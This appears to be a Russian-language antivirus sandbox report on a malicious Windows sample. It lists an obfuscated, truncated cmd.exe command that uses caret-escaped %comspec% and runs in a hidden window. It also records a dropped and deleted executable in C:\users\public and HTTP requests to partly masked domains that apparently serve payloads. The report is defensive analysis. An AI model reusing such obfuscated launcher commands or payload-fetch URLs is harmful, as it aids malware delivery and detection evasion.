Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' zEzunTAsYz NRizLwzFWqAwCGdBRsiUsSSJEL VQnthQm & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %jchdCzMWjpBNfXU%=MGRZNNFsrtfDb&&set %MGYTSbiIiRBdi%=p&&set %PMIBLLIt...
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\15749.exe
Удаляет следующие файлы
- C:\users\public\15749.exe
Сетевая активность
Подключается к
- 'cn##s.com':80
- 'co######spendehamburg.de':443
- 'pk#.goog':80
- 'de###zsch-va.de':443
- 'be###chew.de':80
- 'c-##iko.com':80
TCP
Запросы HTTP GET
- http://cn##s.com/oDjfLHg/
- http://pk#.goog/gsr1/gsr1.crt
- http://be###chew.de/LCZfSj/
- http://c-##iko.com/wpp-app/67CEuQU/
Другие
- 'co######spendehamburg.de':443
- 'de###zsch-va.de':443
UDP
- DNS ASK cn##s.com
- DNS ASK co######spendehamburg.de
- DNS ASK pk#.goog
- DNS ASK de###zsch-va.de
- DNS ASK be###chew.de
- DNS ASK c-##iko.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' zEzunTAsYz NRizLwzFWqAwCGdBRsiUsSSJEL VQnthQm & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %jchdCzMWjpBNfXU%=MGRZNNFsrtfDb&&set %MGYTSbiIiRBdi%=p&&set %PMIBLLIt...' (со скрытым окном)
